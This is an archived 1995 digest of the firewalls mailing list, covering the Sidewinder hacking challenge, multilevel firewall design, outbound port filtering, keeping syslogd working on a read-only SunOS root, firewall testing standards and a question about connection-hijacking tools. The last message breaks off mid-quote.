> [GML addition: Prodigy was accused of doing something similar several
> years ago. In that case it was not nearly as threatening due to: 1) it
> was limited to a single PC, 2) Prodigy couldn't do much with the info
> (i.e. they could not pursue you for copyright infringement, nor were they
> trying to expand into so many businesses the way Microsoft is).]

Larry Barras
Merak Projects, Inc.

From firewalls-owner Tue Aug 1 17:30:54 1995
From: dan thomsen
Date: Tue, 1 Aug 1995 17:22:23 -0500
To: firewalls@greatcircle.com
Subject: Sidewinder Challenge
Message-Id: <199508012222.RAA05070@ender.sctc.com>

For the record

The reward for completing the Sidewinder Challenge has not changed! Someone erroneously posted a message saying that the reward for completing the challenge at DEFCON was $5000. The reward still remains a black nylon flight jacket with the Sidewinder logo on it.

In response to some of the discussion this has generated I thought I would answer a few of the concerns that have been raised.

CONCERN 1. Setting up a challenge site does not provide sufficient testing.

All a challenge site does is test how good the attackers are. We do NOT test the Sidewinder system by setting up a challenge site. We have a Systems test group that does systems testing. They work independently from the developers to test the functionality and security of the system.

CONCERN 2. What good is the challenge, because it is not set up like a firewall?

[Note, for those not familiar with the Sidewinder challenge, we let you login to the Challenge system and from there you have to get to a machine on the internal network. The DEFCON challenge is going to be more difficult and set up more like a firewall]

The Secure Computing Sidewinder challenge focuses on testing the type enforcement technology, not the firewall capability. Type enforcement is what we use to protect sensitive data, applications, and network interfaces in the firewall product.

Why do we focus on type enforcement? First off we want people to look at the system. If it was set up like a firewall only the successful people see inside the system. A firewall challenge is more difficult and attackers would lose interest quickly. Believe it or not we wanted to give the hackers a chance to break into the system.
The standard Sidewinder firewall product was modified to produce a Sidewinder
challenge system that gives the hackers three key advantages:

- A login account on the firewall (demo with no password)
  Normally users do not have accounts on Sidewinder.

- Four access violations before they are logged out
  On the Sidewinder firewall one violation causes a user to be logged out.

- Loose Unix administration
  Rather than remove every piece of software on the system and tighten
  security so hackers have nothing to work with, we left many Unix programs
  on the challenge system, including a compiler. On the Sidewinder firewall
  programs that are not needed are removed.

People can get inside the challenge system and look around. We have had
approximately 10 people get 'root' access. Since type enforcement is
underneath the Unix permissions it doesn't do them any good. The attacker is
still constrained by the underlying type enforcement constraints. As a result
we get to learn what kind of attacks people are using against Unix systems.
More importantly this shows that type enforcement is a useful tool in
preventing system compromises.

The biggest reason to create a challenge site that is different from the
Sidewinder firewall product is to protect our customers. If there ever was a
successful attack found on the Sidewinder challenge site it could not be used
directly on the Sidewinder firewall. The challenge site is currently based on
a pre-1.0 release of Sidewinder. Currently we are shipping 2.0 systems, and
upgrading all our customers to 2.0 systems. We monitor the challenge site
every day and if someone finds a vulnerability we can respond immediately by
closing the vulnerability and notifying all our customers.

The DEFCON firewall challenge is more difficult than the Sidewinder
Challenge. While it looks more like the Sidewinder firewall product we are
only running the DEFCON challenge for a short period of time, and it will be
closely monitored.

CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic?

The answer is both. We learn about attacks on the Unix operating system.
People who login to the challenge site learn about type enforcement. If you
are considering buying a firewall system what better way to evaluate it than
to login and kick the virtual tires.

Dan Thomsen
Secure Computing
thomsen@sctc.com

From firewalls-owner Tue Aug 1 17:59:49 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24463 for firewalls-outgoing; Tue, 1 Aug 1995 16:55:25 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24411 for ; Tue, 1 Aug 1995 16:55:18 -0700
Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma024355; Tue Aug 1 16:54:21 1995
Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id BAA06049; Wed, 2 Aug 1995 01:50:28 +0200
Date: Wed, 2 Aug 1995 01:50:28 +0200
Message-Id: <199508012350.BAA06049@utrecht.knoware.nl>
X-Sender: njb@pop.knoware.nl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
From: njb@knoware.nl (Niels Bjergstrom)
Subject: Re: Multilevel systems
Cc: firewalls@greatcircle.com
X-Mailer:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Padgett writes:

>Our problem today is that suddenly we have put finance and engineering and
>executives and *everybody* into one big pot called "Enterprise".

Yes, this generates a series of security and management problems: migration
of data that should not migrate, lack of knowledge of what a corporation
actually owns, etc. Charting areas or subnets with different risk structures
is one of the first and often challenging (and rewarding) tasks when
attempting to bring networks growing wild under control.
>Trouble is that firewalls are a good answer to the outside threat but a
>*lousy* one for the inside problem. Multilevel separation is an inside
>answer but the firewall is not a good place to apply it.
>
>Instead the finance department needs its own simple firewall between it and
>the rest of the enterprise.

Please explain these seemingly contradictory statements. What is the
difference between THE firewall and A firewall? I find it difficult to see
any great conceptual difference between the protection (firewall) you install
to separate parts of a WAN and the protection (firewall) you install to
separate LANs. In fact, as the problems you touch upon really start to dawn
on management types I suspect that we shall be installing more firewalls
between intra-organisational subnets than between internal nets and the
Internet.

>Not single point multilevel but distributed bilevel.

While it is probably correct that a single-point multilevel solution is only
a viable solution in simple cases (e.g. enforced by a three-NIC router
connected to the Internet on one side, to the campus network on the second,
and to the university administrative network on the third), multi-point
multilevel solutions (or security step solutions, whatever we should call
them) seem to me to be a reasonable solution in cases where you have a number
of domains interconnected, each having different security requirements.
Just like anti-virus protection: on most networks the behaviour-blockers
installed on all the PC type workstations constitute an extremely good
perimeter defence; however inside extra-secure subnets you prevent
unauthorised (standard) diskettes from being accessible, thus forcing all
software on diskettes to pass through a virus-scanning gateway (which we call
a "sheep-dip computer") that encrypts track zero on approved diskettes from
the outside, thus authorising them, and decrypts track zero on diskettes from
the inside to be used on outside computers, after having certified that the
information transported on the diskette is actually allowed to be carried out
of the organisation. The same principle applies to magnetic media carried
into the building by contractors, salespersons, etc.

Thus I think your "multi" is the way to go, whereas I don't agree with your
"bi" :-).

Rgds,
Niels

From firewalls-owner Tue Aug 1 18:01:39 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28127 for firewalls-outgoing; Tue, 1 Aug 1995 17:44:05 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA28074 for ; Tue, 1 Aug 1995 17:43:55 -0700
Received: from lig.cinti.net(204.248.145.100) by miles via smap (V1.3) id sma028023; Tue Aug 1 17:43:35 1995
Received: by sdwsys (Linux Smail3.1.28.1 #20) id m0sdRsw-0009ywC; Tue, 1 Aug 95 20:42 EDT
Message-Id:
From: sdw@lig.net (Stephen D. Williams)
Subject: Re: Port 139 (netbios over TCP)
To: murrell@bctel.net (Brian Murrell)
Date: Tue, 1 Aug 1995 20:42:09 -0400 (EDT)
Cc: darrell@teleport.com, sdw@lig.net, paul@rio.myra.com, firewalls@GreatCircle.COM
In-Reply-To: <199508012229.PAA15835@mocha.bctel.net> from "Brian Murrell" at Aug 1, 95 03:29:38 pm
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1445
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > It's my current opinion that incoming ports should be blocked, but that
> > the outgoing connection is ok. Does anyone disagree?
>
> Hmmmm. Not only is the question debatable, but so is the answer. One could
> argue that limiting the outbound ports can help you detect trojans shipping
> sensitive data outside. Based on that, one could make a good argument for
> limiting outbound access by machines which have sensitive data on them.
>
> However, if I were going to create a trojan I would have a server on my
> machine on port 80 which was waiting for the trojan to ship data to it. To
> the firewall, it would look like web access.

I'd uuencode it and send it to every smtp port I could connect to addressed
to a string of anon-server addresses...

So, besides trojans trying to get out, what other problems can we find?

> b.
>
> Brian J. Murrell                          murrell@bctel.net
> BCTel Advanced Communications             brian@ilinx.com
> Vancouver, B.C.                           brian@wimsey.com
> 604 454 5262

sdw
--
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From firewalls-owner Tue Aug 1 18:30:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00589 for firewalls-outgoing; Tue, 1 Aug 1995 18:05:36 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00355 for ; Tue, 1 Aug 1995 18:05:02 -0700
Received: from foobar.ipsilon.com(204.160.241.205) by miles via smap (V1.3) id sma000317; Tue Aug 1 18:04:19 1995
Received: from localhost.ipsilon.com (localhost.ipsilon.com [127.0.0.1]) by servo.ipsilon.com (8.6.11/8.6.10) with SMTP id SAA21162; Tue, 1 Aug 1995 18:01:38 -0700
Message-Id: <199508020101.SAA21162@servo.ipsilon.com>
X-Authentication-Warning: servo.ipsilon.com: Host localhost.ipsilon.com didn't use HELO protocol
X-Mailer: exmh version 1.6beta 3/23/95
To: kaplan@bpa.arizona.edu (Ray Kaplan)
cc: firewalls@greatcircle.com
Subject: Re: sidewinder challenge
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 01 Aug 1995 18:01:36 -0700
From: Craig Anderson
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Craig Anderson writes:
>
> >So how about doing the Firewall industry equivalent of the NFS industries
> >week-long Inter-Op conference. No marketing weenies allowed, just technical
> >people from each participating vendor attacking each others machines to
> >help improve the industry. No technical results will be published.
> >If some vendor just wants free development help, don't help. Just
> >point out to each other the weaknesses found.
>
> Great idea - how do we do it. Great possibilities here, too.
> Consider
>
> RayK 8) - Better Living Through Authentication - I usually only speak for myself

Start by piggy-backing on the NFS Connectathon (if Sun is interested; I can
ask the right people if need be, unless they're listening already).

The Rules of Engagement (proposed)

Have each vendor distribute their configuration to all registered
participants at least 2 weeks beforehand. The published configuration should
be the configuration the vendor intends to field, to speed up the hack-cycle
(we only have a week). The configuration should not change but it does not
have to be all that detailed. A block diagram of what networks are connected
to which firewall, the exact version and product name being fielded, etc.

The Published configuration must include the location of a file that must be
retrieved from the firewall and another file that must be retrieved from a
host behind the firewall. The files should be plain-text. Getting either file
constitutes a win.

Wins should not be published! Period. Not even a count of wins.

Security Contractors can participate by registering as combatants and try to
break into vendor machines.

If someone gets a win they MUST describe (in detail!) how they did it to the
losing vendor.

All participants must register with their REAL NAME and show ID to prove it.
And somebody please invite the military/NSA/defense-contractors/etc.

Marketing weenies will be stopped at the door; this is for techies only.

Denial of Service attacks are confined to one specific day of the Firewall
Connectathon and do not constitute a win. They are only embarrassing to the
vendor, if say, the firewall crashes because of the attack. Maybe we can all
learn how to diagnose and treat Denial of Service attacks better.

Given that this is just about firewalls and not the entire spectrum of
security policy, physical security of the firewall is not at issue and should
not be attempted. Though it can definitely be discussed and evaluated.

The point of this is to grow and mature the industry, not to gain adversarial
advantage over your competitors. Professionalism is important. Violators will
not be invited back next year.

If it gets big and successful, maybe we should change the name to "the
Hack-Fest" or something.

Craig Anderson

From firewalls-owner Tue Aug 1 19:07:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA05067 for firewalls-outgoing; Tue, 1 Aug 1995 18:51:40 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA05042 for ; Tue, 1 Aug 1995 18:51:36 -0700
Received: from mailhub.nol.com.sg(202.42.165.2) by miles via smap (V1.3) id sma005036; Tue Aug 1 18:51:10 1995
X400-Received: by /c=sg/admd=tas/prmd=nol/; Relayed; 02 Aug 1995 09:47:40 +0800
X400-Received: by mta nolmta in /c=sg/admd=tas/prmd=nol/; Relayed; 02 Aug 1995 09:47:40 +0800
X400-MTS-Identifier: [/c=sg/admd=tas/prmd=nol/; 066BE301ED93C001-nolmta]
Content-Identifier: 066BE301ED93C001
Content-Return: Allowed
X400-Content-Type: P2-1988 ( 22 )
Conversion: Allowed
Original-Encoded-Information-Types: ( IA5-Text);
Priority: normal
Disclose-Recipients: Prohibited
Alternate-Recipient: Allowed
X400-Originator: tists9@mailhub.nol.com.sg
X400-Recipients: non-disclosure;
Message-Id: <066BE301ED93C001*/c=sg/admd=tas/prmd=nol/o=nol/ou=nolsgp/s=tists9/@MHS>
Date: 02 Aug 1995 09:47:40 +0800
From: TISTS9
To: "Aramanuj%ens.com" (Return requested)
cc: "firewalls%greatcircle.com" (Return requested)
Subject: Firewall setup using SUN Netra i
MIME-Version: 1.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Since you are on novell netware, why don't you try Nov*ix from Firefox. It
can save you a lot of IP addresses as well as act as a firewall between your
Netware network and your (in)secure world!
Thanks
Calvin Yap

Send To : firewalls%greatcircle.com @ internet
cc :
>From : Aramanuj%ens.com @ internet
Date : 02/08/95 09:42:00 AM
Subject : Firewall setup using SUN Netra i

____________________________ Start of Memo _____________________________

Hi folks,

Has anyone set up a SUN Netra i as an internet server on a single port
ethernet router (ex: CISCO 2501)? What are the implications if we use packet
filtering at the router level as well as netra internal security. Will this
setup still be considered as a "single-point-of-compromise/failure"?

ps we are on a novell netware 3.12 and due to get in to the (IN)secure world
of INTERNET!!

thanks in advance
arathy ram

____________________________ End of Memo _____________________________

From firewalls-owner Tue Aug 1 20:30:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09525 for firewalls-outgoing; Tue, 1 Aug 1995 20:13:28 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09499 for ; Tue, 1 Aug 1995 20:13:24 -0700
Received: from myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma009487; Tue Aug 1 20:13:03 1995
Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA11095; Wed, 2 Aug 95 12:41:07 CST
Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA16268; Wed, 2 Aug 1995 12:39:34 +0930
From: blymn@awadi.com.AU (Brett Lymn)
Message-Id: <9508020309.AA16268@bunya.awadi>
Subject: Problems with making / read-only
To: firewalls@greatcircle.com
Date: Wed, 2 Aug 1995 12:39:35 +0930 (CST)
X-Mailer: ELM [version 2.4 PL2]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Folks,
	We are trying to build a new firewall and one of the things I wanted
to do was make / and /user read only by diddling the SCSI Disk links. For the
moment we are just mounting the disk ro to see what falls over.
Most of the problems have been worked around in one way or another but we are
having a major problem with syslogd - it insists on recreating /dev/log. Have
people solved this problem before? If so, how?

If it helps, we are running SunOS 4.1.3_U1 on the box

--
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three
hundred and sixty three elephants, fifty carts of forage, the monsoon's about
to break and we're wearing ... we're wearing ... sort of things, like glass,
only dark... dark glass things on our eyes..."
- Terry Pratchett "Moving Pictures".

From firewalls-owner Tue Aug 1 21:01:26 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA10477 for firewalls-outgoing; Tue, 1 Aug 1995 20:37:19 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA10042 for ; Tue, 1 Aug 1995 20:36:25 -0700
Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id smaa10030; Tue Aug 1 20:35:37 1995
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id TAA11195; Tue, 1 Aug 1995 19:52:34 -0700
Received: from uvs1.orl.mmc.com(141.240.192.10) by mycroft via smap (V1.3mjr) id sma011169; Tue Aug 1 19:52:11 1995
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA15305; Tue, 1 Aug 95 22:49:53 -0400
Date: Tue, 1 Aug 95 22:49:53 -0400
Message-Id: <9508020249.AA15305@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Firewalls Testing
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>The European ITSEC seems to be taking a much more corporate-friendly
>>approach to evaluations: companies hire organizations (CLEFs) that do the
>>evaluation, rather than relying on a (free but overworked - and therefore
>>slow) NCSC.

Ah yess, socialized medicine vs "free market". But aren't the places
switched?

Ray rote:

> The labs that I see my clients
>using to test their client / server stuff before they deploy then start in
>the neighborhood of $1megabuck and have a staff of 10 wizards from various
>disciplines, plus a giazillion consultants available for piece work. Anyone
>got about $10mil loose that they can seed this with? ;)

Gee prices have gone up since I mentioned it a year ago (and five years ago
for anti-virus product testing). And the Firewalls-Standards group seems to
have died out. Suspect $5mil to start & $2mil a year plus some effective
begging from Sun, HP, IBM, DEC etc. would be un-scared. Why not-for-profit
exists.

Warmly,
Padgett

ps waiting for Erin

From firewalls-owner Tue Aug 1 21:26:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09624 for firewalls-outgoing; Tue, 1 Aug 1995 20:18:27 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09608 for ; Tue, 1 Aug 1995 20:18:24 -0700
Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma009603; Tue Aug 1 20:17:25 1995
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA15322; Tue, 1 Aug 95 22:59:07 -0400
Date: Tue, 1 Aug 95 22:59:06 -0400
Message-Id: <9508020259.AA15322@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "njb@csehost.knoware.nl"@UVS1.dnet.mmc.com
Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: Multilevel systems
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Nils rites:

>Please explain these seemingly contradictory statements. What is the
>difference between THE firewall and A firewall? I find it difficult to see
>any great conceptual difference between the protection (firewall) you
>install to separate parts of a WAN and the protection (firewall) you install
>to separate LANs.

Reasonable question. The problem with multilevel protection at the firewall
is that the external gateway is not a good place to try to separate
commingled functions e.g. HR and Finance on the same backbone. If instead the
separation exists between equally trusted/equally untrusted levels then a
binary function works; for multilevel networks the only real answer is
encryption.

Consider finance. The single point firewall or internal filter does not have
to be concerned about anything on the internal (finance) net, nor anything on
the outside. Its only concern is things attempting to cross the link.
Multilevel on the other hand must consider separation of two elements on the
same net and that is *much* more difficult.

>Just like anti-virus protection: On most networks the behaviour-blockers
>installed on all the PC type workstations constitute an extremely good
>perimeter defence; however inside extra-secure subnets you prevent
>unauthorised (standard) diskettes from being accessible, thus forcing all
>software on diskettes to pass through a virus-scanning gateway (which we
>call a "sheep-dip computer") that encrypts track zero on approved diskettes
>from the outside, thus authorising them, and decrypts track zero on
>diskettes from the inside to be used on outside computers, after having
>certified that the information transported on the diskette is actually
>allowed to be carried out of the organisation.
You mean like changing the third byte in the FBR from a 90h to "something
else" so that DOS refuses to read it? Change "BATCOMEXE" to BBBCCCEEE?
Wouldn't know about that 8*).

Warmly,
Padgett

From firewalls-owner Tue Aug 1 22:00:26 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12923 for firewalls-outgoing; Tue, 1 Aug 1995 21:44:55 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12884 for ; Tue, 1 Aug 1995 21:44:50 -0700
Received: from sunthing.sjsinc.com(140.174.165.1) by miles via smap (V1.3) id sma012873; Tue Aug 1 21:44:39 1995
Received: by sunthing.sjsinc.com Mailer: sendmail (8.6.12/8.6.9) Protocol: Id: VAA14720; Tue, 1 Aug 1995 21:42:57 -0700
Date: Tue, 1 Aug 1995 21:42:57 -0700
From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
Message-Id: <199508020442.VAA14720@sjsinc.com>
To: firewalls@greatcircle.com
Subject: Re: Huge gapping hole in Win95
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Folks:

Can anybody suggest a software / hardware package that will address the issue
of "big foot in mouth disease." I am trying to extract an oversized shoe from
my feeding orifice....

Regards,

b c++'ing u,

%-) sjs

-------------------------------------------------------------------------------
Stefan Jon Silverman - President                      SJS Associates, N.A., Inc.
                                                      572 Chestnut Street
Distributed Systems Architecture & Implementation     San Francisco, Ca. 94133
                                                      Phone: 415 989 2741
E-mail: sjs@sjsinc.com                                Cell: 415 519 3494
-------------------------------------------------------------------------------
               Weebles wobble, but they don't fall down!!!
-------------------------------------------------------------------------------

From firewalls-owner Tue Aug 1 22:00:41 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12109 for firewalls-outgoing; Tue, 1 Aug 1995 21:24:48 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12084; Tue, 1 Aug 1995 21:24:44 -0700
Received: from quadra.greatcircle.com(198.102.244.36) by miles via smap (V1.3) id sma012078; Tue Aug 1 21:24:12 1995
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 1 Aug 1995 21:23:33 -0800
To: blymn@awadi.com.AU (Brett Lymn), firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Problems with making / read-only
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 12:39 PM 8/2/95, Brett Lymn wrote:
>Folks,
>	We are trying to build a new firewall and one of the things I
>wanted to do was make / and /user read only by diddling the SCSI Disk
>links. For the moment we are just mounting the disk ro to see what
>falls over. Most of the problems have been worked around in one way
>or another but we are having a major problem with syslogd - it insists
>on recreating /dev/log. Have people solved this problem before? If
>so, how?
>
>If it helps, we are running SunOS 4.1.3_U1 on the box

Wouldn't the same trick you use to make logging work within a chroot'ed FTP
partition work here? That is, make /dev/log a symlink to something that _is_
on a writable filesystem?
-Brent
--
Brent Chapman         | Great Circle Associates  | For Firewalls Tutorial info:
Brent@GreatCircle.COM | 1057 West Dana Street    | Tutorial-Info@GreatCircle.COM
+1 415 962 0841       | Mountain View, CA 94041  | http://www.greatcircle.com

From firewalls-owner Tue Aug 1 22:31:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA14158 for firewalls-outgoing; Tue, 1 Aug 1995 22:15:05 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA14107 for ; Tue, 1 Aug 1995 22:14:58 -0700
Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma014088; Tue Aug 1 22:14:18 1995
Received: from relay.tis.com by neptune.TIS.COM id aa26872; 2 Aug 95 1:12 EDT
Received: from pluto.tis.com(192.94.214.99) by relay.tis.com via smap (g3.0.1) id xma010804; Wed, 2 Aug 95 01:04:51 -0400
Received: by tis.com (4.1/SMI-4.1) id AA03424; Wed, 2 Aug 95 01:10:38 EDT
Date: Wed, 2 Aug 95 01:10:38 EDT
From: Marcus J Ranum
Message-Id: <9508020510.AA03424@tis.com>
To: firewalls@greatcircle.com
Subject: firewall standards
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A. Padgett Peterson, P.E. Information Security writes:
>Gee prices have gone up since I mentioned it a year ago (and five years ago
>for anti-virus product testing). And the Firewalls-Standards group seems to
>have died out.

	The firewalls standards group hasn't died out; it's just that the
volume of traffic has dropped to near zero. Since most of the discussion
centered around whether or not to talk about performance, firewalls-standards
quickly achieved a signal-to-noise ratio on a par with firewalls.

	We're on target for releasing the firewall product summary format in
another week or so. I've been folding the substantive contributions from the
list into the draft version. For those who haven't been tracking this, check
out http://iwi.com in the "publications" page.

mjr.
From firewalls-owner Tue Aug 1 23:00:41 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA15426 for firewalls-outgoing; Tue, 1 Aug 1995 22:38:21 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA15397 for ; Tue, 1 Aug 1995 22:38:17 -0700
Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma015389; Tue Aug 1 22:38:10 1995
Received: from relay.tis.com by neptune.TIS.COM id aa27109; 2 Aug 95 1:36 EDT
Received: from pluto.tis.com(192.94.214.99) by relay.tis.com via smap (g3.0.1) id xma010923; Wed, 2 Aug 95 01:28:05 -0400
Received: by tis.com (4.1/SMI-4.1) id AA03541; Wed, 2 Aug 95 01:33:52 EDT
Date: Wed, 2 Aug 95 01:33:52 EDT
From: Marcus J Ranum
Message-Id: <9508020533.AA03541@tis.com>
To: firewalls@greatcircle.com
Subject: Problems with making / readonly
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Most of the problems have been worked around in one way
>or another but we are having a major problem with syslogd - it insists
>on recreating /dev/log. Have people solved this problem before? If
>so, how?

	The BSD-based syslogd has a "-p" flag that specifies a different
address to use for the UNIX domain socket. You could do something like put it
in /tmp. That leaves all the apps that try to open /dev/log; perhaps you can
fool them with a symlink. It really should create it in /var/run/log.

mjr.
From firewalls-owner Wed Aug 2 00:15:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19175 for firewalls-outgoing; Tue, 1 Aug 1995 23:39:52 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19107 for ; Tue, 1 Aug 1995 23:39:37 -0700
From: Cameron_A_P@ceo.sbic.co.za
Received: from net4.sbic.co.za(160.117.116.51) by miles via smap (V1.3) id sma018932; Tue Aug 1 23:38:49 1995
Received: from zork.sbic.co.za by net4.sbic.co.za (5.0/SMI-SVR4) id AA04423; Wed, 2 Aug 1995 08:37:22 +0200
Received: by zork.sbic.co.za (1.00/net4) id AA00151; Wed, 2 Aug 95 08:35:03+2
Date: Wed, 2 Aug 95 08:35:03+2
Message-Id: <9508021235.AA00151@zork.sbic.co.za>
To: firewalls@Greatcircle.Com
Subject: IPWatcher
content-length: 474
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Message:

I have come across a package on Internet called IPWatcher. This package
renders Firewalls and Smart Cards useless in that it allows the person using
it to hijack and take over an established connection.

The URL to get more info on this package is
http://nad.infostructure.com/watcher.html

My question and problem is how do you prevent this from happening. Also are
there other Hacker tools that can do this.
--
Andrew Cameron
Cameron_A_P@ceo.sbic.co.za

From firewalls-owner Wed Aug 2 01:13:36 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA21214 for firewalls-outgoing; Wed, 2 Aug 1995 00:07:43 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA21203 for ; Wed, 2 Aug 1995 00:07:40 -0700
Received: from myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma021196; Wed Aug 2 00:07:00 1995
Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA15001; Wed, 2 Aug 95 16:03:50 CST
Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA17580; Wed, 2 Aug 1995 16:01:16 +0930
From: blymn@awadi.com.AU (Brett Lymn)
Message-Id: <9508020631.AA17580@bunya.awadi>
Subject: Re: Problems with making / readonly
To: mjr@iwi.com (Marcus J Ranum)
Date: Wed, 2 Aug 1995 16:01:18 +0930 (CST)
Cc: firewalls@greatcircle.com
In-Reply-To: <9508020533.AA03541@tis.com> from "Marcus J Ranum" at Aug 2, 95 01:33:52 am
X-Mailer: ELM [version 2.4 PL2]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Marcus J Ranum:
>
>> Most of the problems have been worked around in one way
>>or another but we are having a major problem with syslogd - it insists
>>on recreating /dev/log. Have people solved this problem before? If
>>so, how?
>
>	The BSD-based syslogd has a "-p" flag that specifies a
>different address to use for the UNIX domain socket. You could do
>something like put it in /tmp. That leaves all the apps that try
>to open /dev/log; perhaps you can fool them with a symlink. It
>really should create it in /var/run/log.
>

Yup, that worked. The problem we had was that the -p flag is not documented
in Sun's syslogd man page even though the daemon supports it. Thanks for the
response!
-- 
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..."
- Terry Pratchett "Moving Pictures".

From firewalls-owner Wed Aug 2 01:14:45 1995
From: jgt10@amdahl.com (John G. Thompson)
Date: Tue, 1 Aug 1995 08:26:26 -0700 (PDT)
Subject: Re: multilevel security in firewalls
To: mjr@iwi.com
Cc: ray@skypoint.com, firewalls@greatcircle.com
In-Reply-To: <9507310152.AA18351@tis.com> from "Marcus J Ranum" at Jul 30, 95 09:52:43 pm

> Ray Kaplan writes:
>
> >I say that labels and mandatory access control have everything to do with
> >building a firewall.
>
> They'd sure help, you bet. But almost nobody will use them.

Too true.

> The problem I've often seen is that most of the vendors who
> are building firewalls on multilevel systems haven't done a very good
> job of explaining how they take advantage of the multilevel aspects
> of the system to make the firewall secure.
> The message is:
>
